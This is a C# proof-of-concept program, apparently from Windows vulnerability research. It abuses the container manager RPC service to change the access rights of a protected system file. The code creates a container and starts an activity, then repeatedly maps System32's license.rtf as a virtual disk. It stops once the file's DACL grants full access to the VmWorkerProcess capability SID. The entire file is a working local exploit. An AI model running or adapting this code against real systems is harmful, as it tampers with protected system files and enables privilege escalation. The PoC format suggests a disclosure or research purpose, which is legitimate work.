﻿using NtApiDotNet;
using NtApiDotNet.Ndr.Marshal;
using NtApiDotNet.Win32.Rpc;
using NtApiDotNet.Win32.Security;
using NtApiDotNet.Win32.Security.Authorization;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Threading;

namespace POC
{
    class Program
    {
        static void WaitForProcess()
        {
            int retry_count = 120;
            // Wait for the process to come up.
            while (retry_count-- > 0)
            {
                Thread.Sleep(1000);
                using (var procs = NtProcess.GetProcesses(ProcessAccessRights.GenericAll).ToDisposableList())
                {
                    foreach (var p in procs)
                    {
                        if (p.Name.ToLower() == "cmproxyd.exe")
                        {
                            Console.WriteLine("Found process pid:{0}", p.ProcessId);
                            return;
                        }
                    }
                    Console.WriteLine("Didn't find process, retrying.");
                }
            }
            throw new InvalidOperationException("Wait for process failed.");
        }

        static void StartContainer(string target_path)
        {
            using (var token = NtToken.OpenProcessToken(true))
            {
                Acl dacl = new Acl();
                dacl.AddAccessAllowedAce(GenericAccessRights.GenericAll, KnownSids.World);
                token.SetDefaultDacl(dacl);

                Client c = new Client();
                c.Connect();

                Guid guid = Guid.NewGuid();
                Console.WriteLine("Generating VM Guid: {0}", guid);
                Container_Config s1 = new Container_Config();
                s1.Owner = "Madrid";
                s1.Member8 = 4;
                s1.Member10 = new NdrUInt3264();

                Struct_3 s3 = new Struct_3();
                s3.Member0 = 1;
                s3.Member8 = new string[] { NtProcess.Current.User.ToString() };
                s1.Member18 = s3;

                s1.Member28 = 0x1000;
                s1.Member38 = new Struct_2();
                s1.Member40 = 3;
                s1.Member48 = token;

                int result = c.CmsRpcSrv_CreateContainer(guid, 5, s1, out Struct_7 s7, out NdrContextHandle container_handle);
                if (result != 0)
                {
                    throw new ArgumentException($"CreateContainer: {result}");
                }

                try
                {
                    result = c.CmsRpcSrv_EnableContainerNotifications(container_handle);
                    if (result != 0)
                    {
                        throw new ArgumentException($"EnableNotify: {result}");
                    }

                    // 5000, timeout?
                    result = c.CmsRpcSrv_CreateActivity(container_handle, 5000, out Struct_7 s7_2, out NdrContextHandle activity_handle);
                    if (result != 0)
                    {
                        throw new ArgumentException($"CreateActivity: {result}");
                    }

                    try
                    {
                        result = c.CmsRpcSrv_StartActivityAsync(activity_handle);
                        if (result != 0)
                        {
                            throw new ArgumentException($"Start: {result}");
                        }

                        WaitForProcess();

                        result = c.CmsRpcSrv_MapVirtualDiskToContainer(activity_handle, target_path, @"c:\dummy");
                        while((uint)result != 0x80070570)
                        {
                            Console.WriteLine("Error: {0:X}", result);
                            result = c.CmsRpcSrv_MapVirtualDiskToContainer(activity_handle, target_path, @"c:\dummy");
                            Thread.Sleep(1000);
                        }

                        Sid cap_sid = NtSecurity.GetCapabilitySid("VmWorkerProcess");
                        SecurityDescriptor sd = Win32Security.GetSecurityInfo(target_path, SeObjectType.File, SecurityInformation.Dacl);
                        foreach (var ace in sd.Dacl)
                        {
                            if (ace.Sid == cap_sid && ace.Mask == 0x1F01FF)
                            {
                                Console.WriteLine("Target has been granted full access to capability SID");
                                return;
                            }
                        }
                        throw new ArgumentException("Target file never got capability SID.");
                    }
                    finally
                    {
                        c.CmsRpcSrv_CloseActivity(ref activity_handle);
                    }
                }
                finally
                {
                    c.CmsRpcSrv_CloseContainer(ref container_handle);
                }
            }
        }

        static void Main()
        {
            try
            {
                string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "license.rtf");
                if (!File.Exists(path))
                {
                    throw new ArgumentException("Couldn't find license.rtf file.");
                }
                StartContainer(path);
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
